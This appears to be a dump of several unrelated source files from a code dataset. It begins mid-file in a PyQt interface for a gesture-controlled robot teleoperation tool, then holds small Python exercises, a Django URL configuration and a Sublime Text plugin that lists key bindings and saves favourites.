gl.gd.r.dynamic[-1][n].activated:\n qp.drawRect(w-RIGHT_MARGIN,TOP_MARGIN_GESTURES+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(w-RIGHT_MARGIN-2, TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE, w-RIGHT_MARGIN-2, int(TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE-probabilities[n]*ICON_SIZE))\n qp.drawText(w-RIGHT_MARGIN-90, TOP_MARGIN_GESTURES+n*ICON_SIZE+10, dynamic_gs_names[n])\n\n if gl.gd.l.static and gl.gd.l.static.relevant():\n n_ = gl.gd.l.static.relevant().biggest_probability_id\n qp.drawPixmap(LEFT_MARGIN+ICON_SIZE+10,TOP_MARGIN_GESTURES+n_*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_left.png\"))\n if gl.gd.r.dynamic and gl.gd.r.dynamic.relevant():\n n_ = gl.gd.r.dynamic.relevant().biggest_probability_id\n qp.drawPixmap(w-RIGHT_MARGIN-90,TOP_MARGIN_GESTURES+n_*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_right.png\"))\n\n\n # circ options\n ### DEPRECATED\n if 'circ' in gl.gd.r.dynamic.info.names:\n g = gl.gd.r.dynamic.circ\n if g.activate:\n X = LEFT_MARGIN+130\n Y = TOP_MARGIN+len(static_gs_file_images)*ICON_SIZE\n ARRL = 10 # Arrow length\n radius_2mm = g.radius/2\n qp.drawEllipse(X,Y, radius_2mm, radius_2mm)\n rh = radius_2mm/2\n if g.clockwise == True:\n qp.drawLine(X, Y+rh, X-ARRL, Y+ARRL+rh)\n qp.drawLine(X, Y+rh, X+ARRL, Y+ARRL+rh)\n else:\n qp.drawLine(X, Y+rh, X-ARRL, Y-ARRL+rh)\n qp.drawLine(X, Y+rh, X+ARRL, Y-ARRL+rh)\n if ml.md.live_mode_drawing:\n qp.drawPixmap(w/2, ICON_SIZE/2+TOP_MARGIN, ICON_SIZE/2, ICON_SIZE/2, QPixmap(settings.paths.graphics_path+\"directional.png\"))\n if ml.md.live_mode_drawing_rot:\n qp.drawPixmap(w/2+ICON_SIZE/2, ICON_SIZE/2+TOP_MARGIN, ICON_SIZE/2, ICON_SIZE/2, QPixmap(settings.paths.graphics_path+\"round.png\"))\n\n if self.MoveViewState:\n if ml.md.mode == 'play':\n if ml.md.frames and ml.md.frames[-1].l.visible:\n if ml.md.frames[-1].l.grab_strength:\n qp.drawPixmap(w/2, ICON_SIZE+TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hold.png\"))\n if ml.md.HoldPrevState == False:\n ml.md.HoldAnchor = ml.md.HoldValue - ml.md.frames[-1].l.palm_pose().position.x/len(sl.paths[ml.md.picked_path].poses)\n ml.md.HoldValue = ml.md.HoldAnchor + ml.md.frames[-1].l.palm_pose().position.x/len(sl.paths[ml.md.picked_path].poses)\n ml.md.HoldValue = ml.md.HoldAnchor + ml.md.frames[-1].l.palm_pose().position.x/2\n if ml.md.HoldValue > 100: ml.md.HoldValue = 100\n if ml.md.HoldValue < 0: ml.md.HoldValue = 0\n\n # # TODO: Hard value\n ml.md.HoldPrevState = ml.md.frames[-1].l.grab_strength > 0.8\n diff_pose_progress = 100/len(sl.paths[ml.md.picked_path].poses)\n for i in range(0, len(sl.paths[ml.md.picked_path].poses)):\n qp.fillRect(LEFT_MARGIN+diff_pose_progress*i*((w-40.0)/100.0), 30, 2, 20, Qt.black)\n qp.fillRect(LEFT_MARGIN+diff_pose_progress*ml.md.currentPose*((w-40.0)/100.0)+2, 35, diff_pose_progress*((w-40.0)/100.0), 10, Qt.red)\n qp.drawRect(LEFT_MARGIN, 30, w-40, 20)\n qp.fillRect(LEFT_MARGIN+ml.md.HoldValue*((w-40.0)/100.0), 30, 10, 20, Qt.black)\n\n if self.GesturesViewState:\n '''\n # right lane\n for n, i in enumerate(self.lblRightPanelNamesObj):\n i.setVisible(True)\n i.move(w-RIGHT_MARGIN, int(TOP_MARGIN+n*ICON_SIZE/2))\n if ml.md.present():\n values, activates = self.getRightPanelValues(), self.getRightPanelActivates()\n for n in range(len(values)):\n obj = self.lblRightPanelValuesObj[n]\n obj.move(w-RIGHT_MARGIN, TOP_MARGIN+(n+0.5)*ICON_SIZE/2)\n obj.setText(str(values[n]))\n qp.drawLine(w-RIGHT_MARGIN-5+values[n]*ICON_SIZE, TOP_MARGIN+(n+1)*ICON_SIZE/2, w-RIGHT_MARGIN-5, TOP_MARGIN+(n+1)*ICON_SIZE/2)\n if activates[n]:\n qp.drawRect(w-RIGHT_MARGIN-5, TOP_MARGIN+(n)*ICON_SIZE/2+5, ICON_SIZE, ICON_SIZE/2-10)\n '''\n # orientation\n '''\n if self.cursor_enabled():\n roll, pitch, yaw = ml.md.frames[-1].r.palm_euler()\n x = np.cos(yaw)*np.cos(pitch)\n y = np.sin(yaw)*np.cos(pitch)\n z = np.sin(pitch)\n\n last_pose_ = tfm.transformLeapToUIsimple(ml.md.frames[-1].r.palm_pose())\n x_c,y_c = last_pose_.position.x, last_pose_.position.y\n qp.setPen(QPen(Qt.blue, 4))\n qp.drawLine(x_c, y_c, x_c+y*2*ICON_SIZE, y_c-z*2*ICON_SIZE)\n '''\n\n qp.end()\n\n def configPage(self, e):\n w = self.size().width()\n h = self.size().height()\n # computation part\n qp = QPainter()\n qp.begin(self)\n BarW = (w-LEFT_MARGIN-RIGHT_MARGIN)/settings.NumConfigBars[1]\n BarH = (h-TOP_MARGIN-BOTTOM_MARGIN)/settings.NumConfigBars[0]\n X_START = [int(LEFT_MARGIN+i*BarW+BAR_MARGIN) for i in range(0,settings.NumConfigBars[1])]\n Y_START = [int(TOP_MARGIN+BAR_MARGIN+i*BarH) for i in range(0, settings.NumConfigBars[0])]\n X_LEN = int(BarW-BAR_MARGIN)\n Y_LEN = int(BarH-BAR_MARGIN)\n X_END = np.add(X_START,int(BarW-BAR_MARGIN))\n Y_END = np.add(Y_START,int(BarH-BAR_MARGIN))\n X_BOUND = tuple(zip(X_START, X_END))\n Y_BOUND = tuple(zip(Y_START, Y_END))\n # picking part\n if self.cursor_enabled():\n last_pose_ = tfm.transformLeapToUIsimple(ml.md.frames[-1].r.palm_pose())\n x,y = last_pose_.position.x, last_pose_.position.y\n else:\n x,y = self.mousex, self.mousey\n x_ = (np.min(X_BOUND, 1) < x) & (x < np.max(X_BOUND, 1))\n y_ = (np.min(Y_BOUND, 1) < y) & (y < np.max(Y_BOUND, 1))\n prevPicked = deepcopy(self.pickedSolution)\n for n, i in enumerate(x_):\n for m, j in enumerate(y_):\n valueInt, valueStr = self.readConfigPageValues(m, n)\n self.lblConfNamesObj[n+m*settings.NumConfigBars[1]].move(X_START[n], Y_START[m]-25)\n self.lblConfNamesObj[n+m*settings.NumConfigBars[1]].setVisible(True)\n self.lblConfValuesObj[n+m*settings.NumConfigBars[1]].move(X_START[n]+BarW-40-BAR_MARGIN, Y_START[m]-25)\n self.lblConfValuesObj[n+m*settings.NumConfigBars[1]].setVisible(True)\n self.lblConfValuesObj[n+m*settings.NumConfigBars[1]].setText(valueStr)\n qp.drawRect(X_START[n], Y_START[m], X_LEN, Y_LEN)\n picked = (i and j)\n if (picked == True) and (picked == self.pickedSolution[m, n]):\n self.pickedTime[m, n] += 0.1\n if self.pickedTime[m, n] > 2.0:\n self.saveConfigPageValues(m,n,abs(Y_START[m] - y))\n self.pickedTime[m, n] = 0\n else:\n self.pickedTime[m, n] = 0\n self.pickedSolution[m, n] = picked\n qp.fillRect(X_START[n], Y_START[m], X_LEN, valueInt, QColor('black'))\n\n\n qp.end()\n\n def saveConfigPageValues(self, m, n, value):\n # Items on the list\n # ['Gripper open', 'Applied force', 'Work reach', 'Shift start x', 'Speed', 'Scene change', 'mode', 'Path']\n settings.VariableValues[m, n] = value\n if m == 0:\n if n == 0:\n ml.md.gripper = value\n elif n == 1:\n ml.md.applied_force = value\n elif n == 2:\n ml.md.SCALE = value/50\n elif n == 3:\n ml.md.ENV['start'].x = value/100\n elif m == 1:\n if n == 0:\n ml.md.speed = value\n elif n == 1:\n scenes = settings.getSceneNames()\n v = int(len(scenes)/125. * value)\n if v >= len(scenes):\n v = len(scenes)-1\n sl.scene.make_scene(scene=scenes[v])\n elif n == 2:\n modes = ml.md.modes()\n v = int(len(modes)/125. * value)\n if v >= len(modes):\n v = len(modes)-1\n ml.md.mode = modes[v]\n elif n == 3:\n paths = settings.getPathNames()\n v = int(len(paths)/125. * value)\n if v >= len(paths):\n v = len(paths)-1\n settings.mo.changePlayPath(path_=paths[v])\n\n def readConfigPageValues(self, m, n):\n string = None\n if m == 0:\n if n == 0:\n value = ml.md.gripper\n elif n == 1:\n value = ml.md.applied_force\n elif n == 2:\n value = ml.md.scale*50\n elif n == 3:\n value = ml.md.ENV['start'].x*100\n elif m == 1:\n if n == 0:\n value = ml.md.speed\n elif n == 1:\n if sl.scene:\n scenes = sl.scenes.names()\n value = scenes.index(sl.scene.name)\n string = sl.scene.name\n else: value = 0\n elif n == 2:\n modes = ml.md.modes()\n value = modes.index(ml.md.mode)\n string = ml.md.mode\n elif n == 3:\n value = ml.md.picked_path\n paths = sl.paths.names()\n string = paths[value]\n\n settings.VariableValues[m, n] = float(value)\n if not string:\n string = str(value)\n return value, string\n\n\n def cursor_enabled(self):\n ''' Checks if enough samples are made\n '''\n if ml.md.r_present() and len(ml.md.frames) >= 10:\n return True\n return False\n\n def timerEvent(self, event):\n if ml.md.frames and self.OneTimeTurnOnGesturesViewStateOnLeapMotionSignIn:\n self.OneTimeTurnOnGesturesViewStateOnLeapMotionSignIn = False\n self.GesturesViewState = True\n self.comboPlayNLive.addItem(\"Live hand\")\n\n ''' DEPRECATED\n if ml.md.frames and gl.gd.r.dynamic.info.names:\n fa = ml.md.frames[-1]\n for i in gl.gd.r.dynamic[-1][0:4]: # circ, swipe, pin, touch\n if i.time_visible > 0:\n i.time_visible -= 0.1\n else:\n i.toggle = False\n if fa.r.visible == False:\n for i in gl.gd.r.dynamic[-1]:\n i.toggle = False if isinstance(i.toggle, bool) else [False] * len(i.toggle)\n for i in gl.gd.r.static[-1]:\n i.toggle = False\n if fa.l.visible == False:\n for i in gl.gd.l.dynamic[-1]:\n i.toggle = False if isinstance(i.toggle, bool) else [False] * len(i.toggle)\n for i in gl.gd.l.static[-1]:\n i.toggle = False\n\n self.step = self.step + 1\n '''\n self.update()\n\n\n def mapQtKey(self, key):\n key = str(key)\n mapDict = {\n '0': Qt.Key_0 ,\n '1': Qt.Key_1 ,\n '2': Qt.Key_2 ,\n '3': Qt.Key_3 ,\n '4': Qt.Key_4 ,\n '5': Qt.Key_5 ,\n '6': Qt.Key_6 ,\n '7': Qt.Key_7 ,\n '8': Qt.Key_8 ,\n '9': Qt.Key_9 ,\n 'a': Qt.Key_A ,\n 'b': Qt.Key_B ,\n 'c': Qt.Key_C ,\n 'd': Qt.Key_D ,\n 'e': Qt.Key_E ,\n 'f': Qt.Key_F ,\n 'g': Qt.Key_G ,\n 'h': Qt.Key_H ,\n 'i': Qt.Key_I ,\n 'j': Qt.Key_J ,\n 'k': Qt.Key_K ,\n 'l': Qt.Key_L ,\n 'm': Qt.Key_M ,\n 'n': Qt.Key_N ,\n 'o': Qt.Key_O ,\n 'p': Qt.Key_P ,\n 'q': Qt.Key_Q ,\n 'r': Qt.Key_R ,\n 's': Qt.Key_S ,\n 't': Qt.Key_T ,\n 'u': Qt.Key_U ,\n 'v': Qt.Key_V ,\n 'w': Qt.Key_W ,\n 'x': Qt.Key_X ,\n 'y': Qt.Key_Y ,\n 'z': Qt.Key_Z,\n '': Qt.Key_0\n }\n return mapDict[key]\n\n def thread_testInit(self):\n thread = Thread(target = ml.md.testInit)\n thread.start()\n def thread_testMovements(self):\n thread = Thread(target = ml.md.testMovements)\n thread.start()\n def thread_testMovementsInput(self):\n thread = Thread(target = ml.md.testMovementsInput)\n thread.start()\n def thread_inputPlotJointsAction(self):\n thread = Thread(target = ml.md.inputPlotJointsAction)\n thread.start()\n def thread_inputPlotPosesAction(self):\n thread = Thread(target = ml.md.inputPlotPosesAction)\n thread.start()\n\n\nclass ObjectQt():\n def __init__(self, NAME=None, qt=None, page=None, view_group=['GesturesViewState']):\n ''' Informations about app objects\n Parameters:\n NAME (Str): Name of object\n qr (Qt Object): Interaction variable\n page (Int): On what page this object is\n view_group (Str[]): In which groups this object belongs\n '''\n self.NAME = NAME\n self.qt = qt\n self.page = page\n self.view_group = view_group\n\nclass RepeatableTimer(object):\n def __init__(self, interval, function, args=[], kwargs={}):\n self._interval = interval\n self._function = function\n self._args = args\n self._kwargs = kwargs\n def start(self):\n t = Timer(self._interval, self._function, *self._args, **self._kwargs)\n t.start()\n\n\ndef main():\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n\ndef ui_thread_launch():\n\n if rospy.get_param(\"/mirracle_config/launch_ui\", 'false') == \"true\":\n thread_ui = Thread(target = main)\n thread_ui.daemon=True\n thread_ui.start()\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n","repo_name":"imitrob/teleop_gesture_toolbox","sub_path":"src/ui_lib.py","file_name":"ui_lib.py","file_ext":"py","file_size_in_byte":78396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"18899226330","text":"x = [ [5,2,3], [10,8,9] ] \nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'}\n]\nsports_directory = {\n 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n}\nz = [ {'x': 10, 'y': 20} ]\n\nx[1][0] = 15\nstudents[0][\"last_name\"] = \"Bryant\"\nsports_directory[\"soccer\"][0] = \"Andres\"\nz[0][\"y\"] = 30\n\nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'},\n {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n {'first_name' : 'KB', 'last_name' : 'Tonel'}\n ]\n\ndef iterateDictionary(some_list):\n for i in some_list:\n return f'first name --- {i[\"first_name\"]}, last name --- {i[\"last_name\"]}'\niterateDictionary(students)\n\ndef iterateDictionary2(key_name, some_list):\n keys = []\n for i in some_list:\n keys.append(i[key_name])\n return keys\nprint(iterateDictionary2(\"first_name\", students))\n\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\ndef printInfo(some_dict):\n result = []\n for key in some_dict:\n result.append(f\"{len(some_dict[key])} {key} {some_dict[key]}\")\n return result\nprint(printInfo(dojo))\n","repo_name":"Cameronjs222/Python","sub_path":"fundamental/nested_dic.py","file_name":"nested_dic.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6937649060","text":"from django.conf.urls import patterns, include, url\nfrom mysite.views import home, current_datetime, paint, save, gallery, load, about\n\nurlpatterns = patterns('',\n url(r'^$', home),\n url(r'^about/$',about),\n url(r'^time/$',current_datetime),\n url(r'^paint/$',paint),\n url(r'^save/$', save),\n url(r'^gallery/$', gallery),\n url(r'^gallery/([^/]+)$', load),\n)\n\n\n","repo_name":"manimkv/PaintApp-using-Django-Frame-work","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8720979307","text":"import json, re, os\nimport shutil, zipfile\nimport sublime, sublime_plugin\n\n# Import default package for ST3 only. Needed to determine its path.\nif not int(sublime.version()) < 3000:\n import Default\n\nclass QuickRefCommand(sublime_plugin.ApplicationCommand):\n def __init__(self):\n # Initialize list of commands. Needs to happen here since this value will \n # determine whether to open or close the quick panel.\n self.command_list = None\n # Running Sublime Text 2?\n self.is_st2 = int(sublime.version()) < 3000\n\n def run(self, **kwargs):\n # Get paths.\n self.paths = self.get_paths()\n\n # Get OS platform.\n self.platform = sublime.platform()\n self.platform = self.platform[0].upper() + self.platform[1:].lower()\n\n # If the command list has not be defined, run the plugin.\n if not self.command_list:\n # Set a window reference.\n self.window = sublime.active_window()\n\n # Get settings.\n self.settings = self.get_settings()\n self.settings['regular_run_mode'] = kwargs['regular_run_mode'] if 'regular_run_mode' in kwargs else False\n\n try:\n self.command_list = []\n self.run_commands = []\n self.favourites = []\n\n self.fav_command_list = []\n self.fav_run_commands = []\n\n # Get favourites from file.\n if self.settings['show_favourites']:\n self._add_favourites()\n\n # Keep track of contexts to avoid duplicates.\n self.added_contexts = []\n\n # Keep track of commands to avoid duplicates. User commands should always\n # overwrite defualt key bindings and user key bidnings. User key bindings\n # should always overwrite default key bidnings.\n self.added_user_commands = []\n self.added_commands = []\n \n # Add commands.\n if self.settings['show_user_commands']:\n self._add_user_commands()\n if self.settings['show_user_key_bindings']:\n self._add_user_key_bindings()\n if self.settings['show_default_key_bindings']:\n self._add_default_key_bindings()\n\n # Sort lists alphabetically. Both lists have to be sorted in order to keep them\n # synchronized with each other.\n if self.settings['sort_alphabetically']:\n self.command_list.sort(key = lambda list: list[0].lower())\n self.run_commands.sort(key = lambda list: list[0].lower())\n\n # Always sort favourites.\n self.fav_command_list.sort(key = lambda list: list[0].lower())\n self.fav_run_commands.sort(key = lambda list: list[0].lower())\n\n # Concatenate favourites and other commands to one list.\n self.command_list = self.fav_command_list + self.command_list\n self.run_commands = self.fav_run_commands + self.run_commands\n\n # @todo: Disabled for now.\n # if os.path.exists(self.default_path + '/show_update_splash'):\n # self.command_list = [['- QuickRef has been updated!', '- Select to remove this item and see what\\'s new.']] + self.command_list\n # self.run_commands = [['Show update']] + self.run_commands\n\n # Show quick panel with commands. Set a timeout to allow panel get ready before opening.\n sublime.set_timeout(lambda: self.window.show_quick_panel(self.command_list, self._on_select), 10)\n except Exception as e:\n sublime.status_message('QuickRef says: \"_run() is misbehaving. Here\\'s what happened: ' + str(e) + '\"')\n\n # Otherwise close the quick panel.\n else:\n self.window.run_command('hide_overlay')\n\n def _add_favourites(self):\n \"\"\"\n Add favourites from favourites file.\n \"\"\"\n favourites = os.path.join(self.paths['user_data'], 'favourites.txt')\n if os.path.exists(favourites):\n with open(favourites, 'r') as content:\n for command in content:\n self.favourites.append(command.rstrip())\n\n def _add_user_commands(self):\n \"\"\"\n Add commands specified in QuickRef user settings.\n \"\"\"\n # Parse commands from user settings file.\n user_commands = self.settings['commands']\n\n for command in user_commands:\n # Put keys on one line, separate with commas.\n keys = ', '.join(command['keys'])\n # Add items.\n self._prepare_command(command, keys)\n # Add command to list of added commands.\n self.added_user_commands.append(command['command'])\n\n def _add_user_key_bindings(self):\n \"\"\"\n Add user specified key bindings.\n \"\"\"\n # Load and parse commands from user keymap file.\n user_key_bindings_path = os.path.join(self.paths['user'], 'Default (' + self.platform + ').sublime-keymap')\n user_key_bindings = self.parse_json_file(user_key_bindings_path, True)\n\n for command in user_key_bindings:\n # Put keys on one line, separate with commas.\n keys = ', '.join(command['keys'])\n # Add items.\n self._prepare_command(command, keys)\n # Add command to list of added commands.\n self.added_user_commands.append(command['command'])\n\n def _add_default_key_bindings(self):\n \"\"\"\n Add default key bindings.\n \"\"\"\n # Load and parse commands from default keymap file.\n default_keymap = self.get_default_keymap()\n default_key_bindings = self.parse_json_file(default_keymap, True)\n\n if self.settings['key_filter']:\n # Only add commands with specific shortcut keys.\n if not any(x in keys for x in self.settings['key_filter']):\n return\n\n for command in default_key_bindings:\n # Put keys on one line, separate with commas.\n keys = ', '.join(command['keys'])\n # Add items.\n self._prepare_command(command, keys)\n # Add command to list of added commands.\n self.added_commands.append(command['command'])\n\n def _prepare_command(self, command, keys):\n \"\"\"\n Prepare commands for adding to command lists.\n \"\"\"\n # Check if command is a favourite.\n self.is_favourite = True if command['command'] + ',' + keys in self.favourites else False\n # Ignore duplicates of user added or user keymap commands.\n if command['command'] in self.added_user_commands:\n return\n\n # If there is a user added caption, display that in the list instead of the command.\n caption = command['caption'] if 'caption' in command else command['command']\n # Add context associated with the command (if any).\n context = command['context'] if 'context' in command else ''\n # Add arguments associated with the command (if any).\n args = command['args'] if 'args' in command else ''\n\n if context and self.settings['show_command_contexts']:\n for sub_context in context:\n # Ignore commands with duplicate contexts.\n if self.settings['remove_duplicate_contexts']:\n if command['command'] + sub_context['key'] in self.added_contexts:\n continue\n\n # Beautify commands and prepare them for output.\n caption = self._beautify_caption(command, sub_context)\n # Add command to command lists.\n self._add_command(caption, command, keys, args, context)\n # Add sub context key to list of contexts.\n self.added_contexts.append(command['command'] + sub_context['key'])\n else:\n # Ignore duplicates of default commands.\n if self.settings['remove_duplicates']:\n if command['command'] in self.added_commands:\n return\n\n # Beautify commands and prepare them for output.\n caption = self._beautify_caption(command, '')\n # Add command to command lists.\n self._add_command(caption, command, keys, args, context)\n\n def _add_command(self, caption, command, keys, args, context):\n \"\"\"\n Add command to command lists.\n \"\"\"\n # Add caption and keyboard shortcuts.\n list_item = [caption] + [keys]\n # Add caption, command, arguments and context for each context.\n command_item = [caption] + [command['command']] + [args] + [context]\n\n # Divide favourites from other commands. \n if self.is_favourite:\n self.fav_command_list.append(list_item)\n self.fav_run_commands.append(command_item)\n else:\n self.command_list.append(list_item)\n self.run_commands.append(command_item)\n\n def _beautify_caption(self, command, sub_context):\n \"\"\"\n Make captions prettier.\n \"\"\"\n if 'caption' in command:\n # Use supplied caption.\n caption = command['caption']\n elif self.settings['beautify_captions']:\n # Remove low dashes and capitalize first letter.\n caption = command['command'].replace('_', ' ').capitalize()\n else:\n # Keep command name as-is.\n caption = command['command']\n # If macro command, add macro name.\n if 'run_macro_file' == command['command']:\n caption += ' - ' + command['args']['file'].replace('Packages/Default/', '').replace('.sublime-macro', '')\n # Add context.\n if sub_context:\n caption += ' (' + sub_context['key'].replace('_', ' ').replace('setting.', '') + ')'\n # Add prefix to favourites only if showing favourites.\n if self.is_favourite and self.settings['show_favourites']:\n caption = '* ' + caption\n\n return caption\n\n def _on_select(self, idx):\n \"\"\"\n On list item selection.\n \"\"\"\n # If command list has items and one was selected (index equals zero or more).\n if self.command_list and idx > -1:\n # @todo: Disabled for now.\n # # Show latest updates in new window.\n # if 'Show update' == self.run_commands[idx][0]:\n # # Undefine command list in order to \"reset\" the plugin (see run()).\n # self.command_list = None\n # # Open file with latest changes from change log.\n # self.window.open_file(self.default_path + '/InThisVersion.txt', sublime.TRANSIENT)\n # # Remove splash control file to indicate that no splash should be shown.\n # os.remove(self.default_path + '/show_update_splash')\n\n # Add favourites to file.\n if not self.settings['regular_run_mode']:\n try:\n # Open a (new) favourites file.\n favourites = open(os.path.join(self.paths['user_data'], 'favourites.txt'), 'w')\n # Concatenate the complete command.\n command = self.run_commands[idx][1] + ',' + self.command_list[idx][1] \n # Add command if not in favourites list.\n if not command in self.favourites:\n favourites.write(command + '\\n')\n # Add all commands in favourites list except the selected one (will remove the command if already present).\n for saved_command in self.favourites:\n if saved_command != command:\n favourites.write(saved_command + '\\n')\n # Close file.\n favourites.close()\n\n # Undefine command list in order to \"reset\" the plugin (see run()).\n self.command_list = None\n # Run QuickRef again.\n self.run()\n except Exception as e:\n sublime.status_message('QuickRef says: \"_on_select() is misbehaving. Here\\'s what happened: ' + str(e) + '\"')\n\n # Do not run command if plugin is in hardcore mode (learn by not doing!).\n elif not self.settings['hardcore_mode']:\n # Run the command that corresponds with the selected item's caption.\n if not self.is_st2:\n # In ST3 it is necessary to explicitly call run_command() for TextCommand (ST2 can handle all types from ApplicationCommand).\n self.window.active_view().run_command(self.run_commands[idx][1], self.run_commands[idx][2])\n # Run command.\n self.window.run_command(self.run_commands[idx][1], self.run_commands[idx][2])\n # Undefine command list in order to \"reset\" the plugin (see run()).\n self.command_list = None\n else:\n # Undefine command list in order to \"reset\" the plugin (see run()).\n self.command_list = None\n\n def parse_json_file(self, file, clean_json = False):\n \"\"\"\n Parses a JSON file and removes invalid patterns.\n \"\"\"\n try:\n if clean_json:\n # Regular expression for comments.\n comment_re = re.compile(\n '(^)?[^\\S\\n]*/(?:\\*(.*?)\\*/[^\\S\\n]*|/[^\\n]*)($)?',\n re.DOTALL | re.MULTILINE\n )\n\n with open(file, 'r') as f:\n content = ''.join(f.readlines())\n # Remove illegal commas (,) from last item in JSON arrays.\n content = re.sub(r',\\n\\s+]', '\\n]', content)\n # @todo: Fix.\n # Colons (:) make json module raise an exception, so the whole problematic part is remowed.\n # Unfortunately this will also render all macros unable to run from QuickRef.\n content = re.sub(r'res://', '', content)\n # Look for comments.\n match = comment_re.search(content)\n while match:\n content = content[:match.start()] + content[match.end():]\n match = comment_re.search(content)\n\n json_object = json.loads(content)\n\n else:\n with open(file, 'r') as f:\n content = ''.join(f.readlines())\n json_object = json.loads(content)\n\n return json_object\n\n except (ValueError, Exception) as e:\n sublime.status_message('QuickRef says: \"We have a JSON error. Here\\'s what happened: ' + str(e) + '\"')\n\n def get_paths(self):\n \"\"\"\n Fetches important paths.\n \"\"\"\n sublime_packages_path = sublime.packages_path()\n paths = {\n 'user': os.path.join(sublime_packages_path, 'User'),\n 'user_data': os.path.join(sublime_packages_path, 'User', 'QuickRefData')\n }\n\n return paths\n\n def get_settings(self):\n \"\"\"\n Fetches settings.\n \"\"\"\n # Get paths.\n paths = self.get_paths()\n # Make sure there is a data directory.\n if not os.path.isdir(paths['user_data']):\n os.makedirs(paths['user_data'])\n\n # Load settings file.\n settings_object = sublime.load_settings('QuickRef.sublime-settings')\n\n # Get settings and commands.\n settings = settings_object.get('settings')\n settings['commands'] = settings_object.get('commands')\n\n return settings\n\n def get_default_keymap(self):\n \"\"\"\n Fetches default key bindings.\n \"\"\"\n # Get paths.\n paths = self.get_paths()\n # Prepare settings filename.\n keymap_file = 'Default (' + self.platform + ').sublime-keymap'\n # Set data directory path.\n user_data_keymap = os.path.join(paths['user_data'], keymap_file)\n\n if self.is_st2:\n return os.path.join(sublime.packages_path(), 'Default', keymap_file)\n else:\n default_package = os.path.dirname(Default.__file__)\n \n # Check if there is a default keymap\n if not os.path.exists(user_data_keymap):\n # Extract and copy the default keymap to data directory.\n with zipfile.ZipFile(default_package, 'r') as zip:\n zip.extract(keymap_file, paths['user_data'])\n\n # Check if the default keymap in the data directory is outdated.\n if os.path.getmtime(default_package) > os.path.getmtime(user_data_keymap):\n # Extract and copy the default keymap to data directory.\n with zipfile.ZipFile(default_package, 'r') as zip:\n zip.extract(keymap_file, paths['user_data'])\n\n return user_data_keymap","repo_name":"terrierscript/sublime-settings","sub_path":"settings/Packages/QuickRef/QuickRef.py","file_name":"QuickRef.py","file_ext":"py","file_size_in_byte":15028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11190294213","text":"# 부분집합의 합이 10인 경우 출력\n\nN = 10\narr = list(range(1,N+1))\nselected = [0]*(N)\ncnt = 0\n# 각 index 요소가 부분집합\ndef powerset(selected, idx, sum_value): # sum_value는 백트래킹 위한 것\n global cnt\n if sum_value > 10:\n return\n\n if idx == N:\n sum_cur = 0\n sub_set = []\n for i in range(len(selected)):\n if selected[i] == 1:\n sum_cur += arr[i]\n sub_set.append(arr[i])\n cnt += 1\n\n if sum_cur == 10:\n print(sub_set)\n # print(arr[i], end=' ')\n # print()\n # print(selected)\n return\n\n selected[idx] = 1\n powerset(selected,idx+1,sum_value+ arr[idx])\n selected[idx] = 0\n powerset(selected,idx+1,sum_value)\n\npowerset(selected,0,0)\nprint(cnt)\n\n\n\n# selected 없이 구현\ndef powerset2(idx, sum_value,sub_set):\n if sum_value > 10:\n return\n\n if idx == N :\n print(sub_set)\n # if sum_value==10:\n # print(sub_set)\n return\n sub_set.append(arr[idx])\n powerset2(idx+1, sum_value+arr[idx], sub_set)\n sub_set.pop()\n powerset2(idx +1, sum_value , sub_set)\n\npowerset2(0,0,[])","repo_name":"jisy2718/_algorithm","sub_path":"정리할것들/0330_분할정복_백트래킹/subset_sum.py","file_name":"subset_sum.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74605897512","text":"class MyClass :\r\n\r\n user_name = \"\" # インスタン変数の宣言\r\n age = \"\" # インスタンス変数の宣言\r\n def say ( self ) :\r\n print ( \"名前:{0},年齢:{1}\" . format ( self.user_name , self.age ) ) #formatの中身はuser1.user_nameでもいいがuser2も表示したいから、インスタント変数が定義されたself(引数)を使ってる\r\n\r\n# 1つめのインスタンス\r\nuser1 = MyClass ( ) #インスタンス化 #クラスのメソッドを呼び出す場合は、クラスをインスタンス化したものを格納した変数から、クラスのメソッドを呼び出します。\r\nuser1 . user_name = \" 山田 \" #アトリビュート(class内の変数) 山田を代入\r\nuser1.age = 20\r\n\r\n# 2つめのインスタンス\r\nuser2 = MyClass ( )\r\nuser2.user_name = \" 鈴木 \" #アトリビュート\r\nuser2 . age = 40\r\nuser1 . say ( ) #ここではuser1が\"say\"というメソッドの中の処理を実行させてる\r\nuser2 . say ( ) #以上同文","repo_name":"YamatoKato/bacics","sub_path":"basics/MyPython/classtest1.py","file_name":"classtest1.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 